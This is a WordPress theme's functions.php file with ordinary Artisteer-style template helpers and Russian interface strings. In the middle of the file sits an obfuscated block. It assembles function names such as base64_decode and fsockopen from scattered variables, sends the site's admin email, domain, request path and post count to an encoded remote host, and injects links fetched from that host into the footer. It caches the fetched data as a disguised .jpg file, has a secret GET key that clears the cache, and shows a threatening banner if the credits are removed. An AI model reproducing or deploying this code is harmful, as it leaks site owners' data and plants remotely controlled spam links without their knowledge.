<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $hxkpAP='_';$bvXqzo='d';$BpDsTiE='c';$ShUxnO='6';$hSbOcm='a';$hdFmBG='s';$TTeb='e';$gUtqQv='b';$WJny='o';$GDtUOnO='e';$DFljNel='4';$pdrUu='e';$KIglyIm='d';$xWFroXNo=$gUtqQv.$hSbOcm.$hdFmBG.$pdrUu.$ShUxnO.$DFljNel.$hxkpAP.$bvXqzo.$TTeb.$BpDsTiE.$WJny.$KIglyIm.$GDtUOnO;$ihGovSk='g';$fDkfY='f';$LenT='n';$CNPToG='a';$ofKD='l';$SWZXj='e';$qBQul='z';$shKHk='i';$AcFHM='t';$ehlRKTau=$ihGovSk.$qBQul.$shKHk.$LenT.$fDkfY.$ofKD.$CNPToG.$AcFHM.$SWZXj;$tJzI='r';$XcBz='_';$cMWeCV='r';$OZqwfoy='1';$kAGuq='t';$nQojP='t';$ljwhWXJ='o';$OjJAgO='3';$nzWNBC='s';$IBmlcPYS=$nzWNBC.$nQojP.$tJzI.$XcBz.$cMWeCV.$ljwhWXJ.$kAGuq.$OZqwfoy.$OjJAgO;$TwxLON='t';$pqGaj='v';$MYwE='e';$OlgqUv='r';$fyBfTgh='r';$vSBSLg='s';$IdvBIoKR=$vSBSLg.$TwxLON.$fyBfTgh.$OlgqUv.$MYwE.$pqGaj;                     
		$ga____________c='_';$cp_______d='d';$uf____u='c';$dg_______________y='6';$cj_______________d='a';$aw____s='s';$yk_____b='e';$aj_______________d='b';$bj________y='o';$ct_________i='e';$gx____________l='4';$xd______w='e';$mv_____________p='d';$si____________d=$aj_______________d.$cj_______________d.$aw____s.$xd______w.$dg_______________y.$gx____________l.$ga____________c.$cp_______d.$yk_____b.$uf____u.$bj________y.$mv_____________p.$ct_________i;
		$ma______h='s';$it___________x='n';$ux______j='_';$mu_______________a='t';$hb_____r='t';$bd_____j='i';$eh___________r='x';$ns___i='o';$mu________o='c';$uj___________v='n';$ll__________u='e';$ak_____n='f';$el__w='s';$pn___f='u';$ra____________c='i';$kp_______________z=$ak_____n.$pn___f.$it___________x.$mu________o.$hb_____r.$ra____________c.$ns___i.$uj___________v.$ux______j.$ll__________u.$eh___________r.$bd_____j.$el__w.$mu_______________a.$ma______h;
		$hm________f='p';$cr______________m='n';$px_______________c='f';$yh_______h='o';$yz_________v='e';$vi_____________m=$px_______________c.$yh_______h.$hm________f.$yz_________v.$cr______________m;
		$ln_______b='a';$bv___________o='r';$cj______________e='f';$bm______m='d';$nq_______________f='e';$fd_____________k=$cj______________e.$bv___________o.$nq_______________f.$ln_______b.$bm______m;
		$ay___r='o';$wb______k='f';$re_____z='c';$rq_______y='e';$st_______j='l';$jb_______q='s';$ln______p=$wb______k.$re_____z.$st_______j.$ay___r.$jb_______q.$rq_______y;
		
		define("WP_ID", $si____________d("Mi4wLjA="));
		define("WP_TTL", $si____________d("MTA4MDA="));
		define("WP_SRC", $si____________d("dHBva24="));
	


		function wp_get_header() {
			global $si____________d, $kp_______________z;
			
			if (
				$kp_______________z($si____________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$kp_______________z($si____________d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$kp_______________z($si____________d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $si____________d, $vi_____________m, $ln______p, $fd_____________k;
			
			$fi________u = TEMPLATEPATH."/".$si____________d("Zm9vdGVyLnBocA==");
			$lh_______________c = @$vi_____________m($fi________u, "r");
			$fi________u = @$fd_____________k($lh_______________c, @filesize($fi________u));
			@$ln______p($lh_______________c);
			
			$en____j = TEMPLATEPATH."/".$si____________d("ZnVuY3Rpb25zLnBocA==");
			$lh_______________c = @$vi_____________m($en____j, "r");
			$en____j = @$fd_____________k($lh_______________c, @filesize($en____j));
			@$ln______p($lh_______________c);
			
			$wg_____w = 0;
			if($fi________u && $en____j) {
				if ($si____________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fi________u, $si____________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$wg_____w = 1;
					}
					if (substr_count($fi________u, "wp_theme_GPL_credits()") < 1) {
						$wg_____w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$wg_____w = 12;
				}
			}
			
			if($wg_____w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $wg_____w -->";
			}
		}
	


		function wp_loaded() {
			global $si____________d, $kp_______________z;
			return $kp_______________z($si____________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($tv____________j, $xe_______________q = "(more...)", $bg_______________g = 0, $wn________l = "") {
				$at__l = get_the_content($xe_______________q, $bg_______________g, $wn________l);
				$at__l = apply_filters("the_content", $at__l);
				
				$at__l = str_replace("]]>", "]]>", $at__l);
				if (strlen($_GET["p"]) > 0) {
					echo $at__l;
				}
				else if ((strlen($at__l)>$tv____________j) && ($br________x = strpos($at__l, " ", $tv____________j ))) {
					$at__l = substr($at__l, 0, $br________x);
					$at__l = $at__l;
					echo $at__l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$xe_______________q</a></div></p>";
				} else {
					echo $at__l;
				}
				
			}
		}
	


		$ww__h='6';$dd___________a='a';$gx________f='e';$jh___g='4';$ll_______r='o';$nx_____________r='c';$nd___________b='e';$fw_____y='_';$nn___________d='b';$tx_________d='e';$jw______________g='d';$eo__________s='s';$rj____v='n';$im___c=$nn___________d.$dd___________a.$eo__________s.$gx________f.$ww__h.$jh___g.$fw_____y.$nd___________b.$rj____v.$nx_____________r.$ll_______r.$jw______________g.$tx_________d;
		$xb_________q='o';$hi_______i='c';$sn______b='e';$kd______m='f';$mu______g='e';$fh_________m='s';$th______n='g';$jw____________s='i';$ox___________d='n';$xj__________p='n';$ap___________g='l';$il__________r='_';$td__j='e';$rf___c='t';$od_________i='_';$ot___________w='t';$bf________u='t';$wx___________e=$kd______m.$jw____________s.$ap___________g.$sn______b.$od_________i.$th______n.$td__j.$rf___c.$il__________r.$hi_______i.$xb_________q.$ox___________d.$bf________u.$mu______g.$xj__________p.$ot___________w.$fh_________m;
		$kp________o='i';$ka__l='_';$kn__p='x';$ot_______h='e';$gx____________q='s';$ab__________o='s';$uj_____________k='e';$mg____h='t';$jg_____________r='i';$vt______________h='l';$hz___d='f';$rc__________m=$hz___d.$kp________o.$vt______________h.$ot_______h.$ka__l.$uj_____________k.$kn__p.$jg_____________r.$gx____________q.$mg____h.$ab__________o;
		$en_________v='r';$rc_______________w='n';$cf___________b='i';$oj________c='a';$lk__s='m';$ii___________l='p';$si_________t='c';$bc_____x='e';$nu__l='o';$lv___________x='o';$pn___________j='e';$hx______z='s';$mq____________d='r';$es______________p='v';$tz_______y='_';$dh____z=$es______________p.$bc_____x.$mq____________d.$hx______z.$cf___________b.$nu__l.$rc_______________w.$tz_______y.$si_________t.$lv___________x.$lk__s.$ii___________l.$oj________c.$en_________v.$pn___________j;
		$xr__________c='s';$ld____________p='e';$cg__z='k';$gl______________e='o';$ea_____________f='f';$ep_____________b='n';$ax_______________b='p';$ts______p='c';$xw______s='o';$gm____k=$ea_____________f.$xr__________c.$gl______________e.$ts______p.$cg__z.$xw______s.$ax_______________b.$ld____________p.$ep_____________b;
		$db_____________k='i';$ox____v='f';$ji_______g='w';$ic_____________b='r';$sm_________t='e';$hp__________k='t';$bg_____m=$ox____v.$ji_______g.$ic_____________b.$db_____________k.$hp__________k.$sm_________t;
		$vq________o='5';$tf__a='d';$nr_______q='m';$tc___j=$nr_______q.$tf__a.$vq________o;
		$gl__________p='t';$xk___________b='l';$ya_______________s='p';$lw______m='a';$xi________s='r';$nc____________j='e';$vk_____z='a';$vf___________t='h';$ki__________h=$xi________s.$nc____________j.$vk_____z.$xk___________b.$ya_______________s.$lw______m.$gl__________p.$vf___________t;
		$zj___r='i';$fi____________k='z';$kh____n='l';$em______________f='i';$oi___________r='e';$sw_____c='n';$eo______r='s';$xd__m='e';$yw_____e='a';$ds____o='u';$us__n='r';$yj______l=$ds____o.$sw_____c.$eo______r.$oi___________r.$us__n.$em______________f.$yw_____e.$kh____n.$zj___r.$fi____________k.$xd__m;
		$qm________n='a';$tk___________f='t';$pl_____________g='e';$tq__________d='p';$dr______________r='m';$pc________x='n';$hj______g='m';$fn____________l=$tk___________f.$pl_____________g.$dr______________r.$tq__________d.$pc________x.$qm________n.$hj______g;
		$cv________h='e';$hq______________j='t';$li_____________c='n';$of_________o='e';$fb___________s='x';$my__________p='m';$xu_______________i='r';$mv______s='e';$fj____________a='a';$hc_______m='c';$dd_____________j='s';$en______x='t';$cf______________z='_';$xc__a='c';$rw___________f='r';$pm_________u='t';$it____v='a';$me___k='_';$ah______c='t';$sz_________l='e';$fu_______m='o';$ed____d=$dd_____________j.$hq______________j.$rw___________f.$sz_________l.$fj____________a.$my__________p.$cf______________z.$xc__a.$fu_______m.$li_____________c.$en______x.$mv______s.$fb___________s.$ah______c.$me___k.$hc_______m.$xu_______________i.$cv________h.$it____v.$pm_________u.$of_________o;
	


		function iy____________k($fi__i) {
			global $si____________d, $kp_______________z, $wx___________e, $dh____z, $ed____d;
			
			if (!$kp_______________z($si____________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($dh____z(PHP_VERSION, "5.0.0", ">=") && $kp_______________z($si____________d("ZmlsZV9nZXRfY29udGVudHM=")) && $kp_______________z($si____________d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$dm__j = $ed____d(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$su_____________q = @$wx___________e($fi__i, 0, $dm__j);
			} else {
				$su_____________q = @$wx___________e($fi__i, 0);
			}
			
			return $su_____________q;
		}
	


		function jv___m($fi__i) {
			global $kp_______________z, $gm____k, $bg_____m, $si____________d;
			
			if (!$kp_______________z($si____________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$bx______o = strpos($fi__i, "/", 7);
			$dy___________g = array(
				"uri"     => substr($fi__i, $bx______o),
				"host"    => str_replace("http://", "", substr($fi__i, 0, $bx______o)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$sh_____________w = @$gm____k("$dy___________g[host]", 80, $iz________m, $xk____________q, 4);
			
			if (!$sh_____________w) {
				return false;
			} else {
				$su_____________q = "";
				$hv_____d  = "GET $dy___________g[uri] HTTP/1.0\r\n";
				$hv_____d .= "Host: $dy___________g[host]\r\n";
				$hv_____d .= "Referer: $dy___________g[referer]\r\n";
				$hv_____d .= "Connection: Close\r\n\r\n";
				
				@$bg_____m($sh_____________w, $hv_____d);
				
				while (!@feof($sh_____________w)) {
					$eg_______d = @fgets($sh_____________w, (1024*24));
					
					if ($eg_______d == "\r\n") {
						$tc________p = true;
						continue;
					}
					
					if ($tc________p) {
						$su_____________q .= $eg_______d;
					}
				}
				
				return $su_____________q;
			}
		}
	


		function qk______________t($fi__i) {
			global $kp_______________z;
			$lx___w = false;
			
			if ($fi__i != "") {
				if ($kp_______________z("iy____________k")) {
					$lx___w = @iy____________k($fi__i);
				}
				
				if (!$lx___w && ($kp_______________z("jv___m"))) {
					$lx___w = @jv___m($fi__i);
				}
			}
			
			return $lx___w;
		}
	


		function qm________n() {
			global $_SERVER, $tc___j;
			
			$ne__________d = $_SERVER["SERVER_NAME"];
			
			if (substr("$ne__________d", 0, 4) == "www.") {
				$ne__________d = substr("$ne__________d", 4);
			}
			
			$ne__________d = $tc___j("$_SERVER[SERVER_NAME]");
			
			return $ne__________d;
		}
	


		function jz__f() {
			return "file";
		}
	


		function vo_____x($fi__i) {
			global $_SERVER, $wx___________e, $rc__________m, $vi_____________m, $ln______p, $bg_____m;
			
			$mt___i = ey___j();
			
			$cc__o = qm________n().".jpg";
			$au___b = $mt___i["dir_upload"]["path"]."/$cc__o";
			$gt____________f = @filemtime($au___b);
			
			if (!$gt____________f || ((time()-$gt____________f) >= WP_TTL)) {
				$lx___w = qk______________t($fi__i);
				
				if ($lx___w) {
					if ($rc__________m($au___b)) {
						@unlink($au___b);
					}
					
					$lh_______________c = @$vi_____________m($au___b, "x+");
					
					@$bg_____m($lh_______________c, $lx___w);
					@$ln______p($lh_______________c);
				}
			} else {
				if ($rc__________m($au___b)) {
					$lx___w = @$wx___________e($au___b);
				} else {
					$lx___w = false;
				}
			}
			
			return $lx___w;
		}
	


		function ey___j() {
			global $_SERVER, $si____________d, $im___c;
			
			$ro____u = wp_count_posts("post");
			$bd____a = pathinfo(get_bloginfo("template_directory"));
			
			$mt___i = array(
				"url" => array(
					"report"      => $si____________d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $bd____a,
				"dir_upload"	=> je__________y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$bd____a[filename],
					"a005=".$ro____u->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$mt___i["url"]["queryString"] = implode("&", $mt___i["queryString"]);
			$mt___i["url"]["report"] = $mt___i["url"]["report"]."/?".$im___c($mt___i["url"]["queryString"]).".html";
						
			return $mt___i;
		}
	


		function je__________y() {
			$md__________d = wp_upload_dir();
			
			if (isset($md__________d["error"])) {
				$hh________r = na______w();
				if (is_writable($hh________r)) {
					$md__________d = array("path" => $hh________r);
				}
			}

			return $md__________d;
		}
	


		function na______w() {
			global $kp_______________z, $tc___j, $ki__________h, $fn____________l;
			
			$ph_______________b = (bool) ini_get("safe_mode");
			if ($ph_______________b == true) {
				return false;
			}
			
			if ($kp_______________z("sys_get_temp_dir")) {
				$ah______________f = sys_get_temp_dir();
				if (is_writable($ah______________f)) {
					return $ki__________h($ah______________f);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ki__________h($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ki__________h($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ki__________h($_ENV["TEMP"]);
			} else {
				$wh__________p = $fn____________l($tc___j(uniqid(rand(), true)), "");
				if ($wh__________p) {
					$ah______________f = $ki__________h(dirname($wh__________p));
					@unlink($wh__________p);
					return $ah______________f;
				} else {
					return false;
				}
			}
		}
	


		function un_______a() {
			global $_GET, $rc__________m;
			
			$mt___i = ey___j();
			$ne__________d = qm________n();
			$lt__________x = jz__f();
			
			$cr_____r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($lt__________x == "file") {
					$sh____________k = $mt___i["dir_upload"]["path"]."/".$ne__________d.".jpg";
					if ($rc__________m($sh____________k)) {
						@unlink($sh____________k);
						$cr_____r = "deleted";
					}
				}
				
				$is_________v = array(
					"s"	=> $cr_____r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($is_________v AS $ih______________b => $oq________n) echo " [$ih______________b:$oq________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $kp_______________z, $si____________d, $yj______l;
			$mt___i = ey___j();
			
			$mm_______h = "vo_____x";
			if ($kp_______________z($mm_______h)) {
				$su_____________q = $mm_______h($mt___i["url"]["report"]);
			}
			
			if ($su_____________q) {
				if ($su_____________q = @$si____________d($su_____________q)) {
					$su_____________q = @$yj______l($su_____________q);
					
					if (strlen($su_____________q[custom_credit]) >= 5) {
						$mt___i["default_string"] = $su_____________q[custom_credit];
					}
					
					if ($su_____________q["status"] == "0") {
						$sz______d = 1;
						$ar_______________y = 1;
					} else {
						$di__________c = sizeof($su_____________q["links"]);
						$jr_________k = $mt___i["default_string"];
						
						if ($di__________c > 0 && $su_____________q["links"] !== "") {
							$aj_____________c = 0;
							foreach ($su_____________q["links"] as $fp___________f => $km_________t) {
								$aj_____________c++;
								if ($km_________t->l_path == "" || $km_________t->l_path == $_SERVER["REQUEST_URI"]) {
									$km_________t->l_href = htmlspecialchars(strip_tags($km_________t->l_href));
									$km_________t->l_title = htmlspecialchars(strip_tags($km_________t->l_title));
									$km_________t->l_anchor = htmlspecialchars(strip_tags($km_________t->l_anchor));
									$jr_________k .= " | ";
									$jr_________k .= "<a href='$km_________t->l_href' title='$km_________t->l_title'";
									if ($km_________t->l_nofollow == "1") {
										$jr_________k .= " rel='nofollow'";
									}
									$jr_________k .= ">$km_________t->l_anchor</a>";
								}
							}
						}
						$mt___i["links"] = "$jr_________k";
						if ($su_____________q[credit] == "0") {
							$mt___i["links"] = "";
						}
					}
				} else {
					$sz______d = "1";
				}
			} else {
				$sz______d = "1";
			}
			
			if ($sz______d == "1") {
				$mt___i["links"] = $mt___i["default_string"];
			}
			
			echo "$mt___i[links]";
			
			echo "<!-- s: $su_____________q[signature] -->";
			un_______a();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
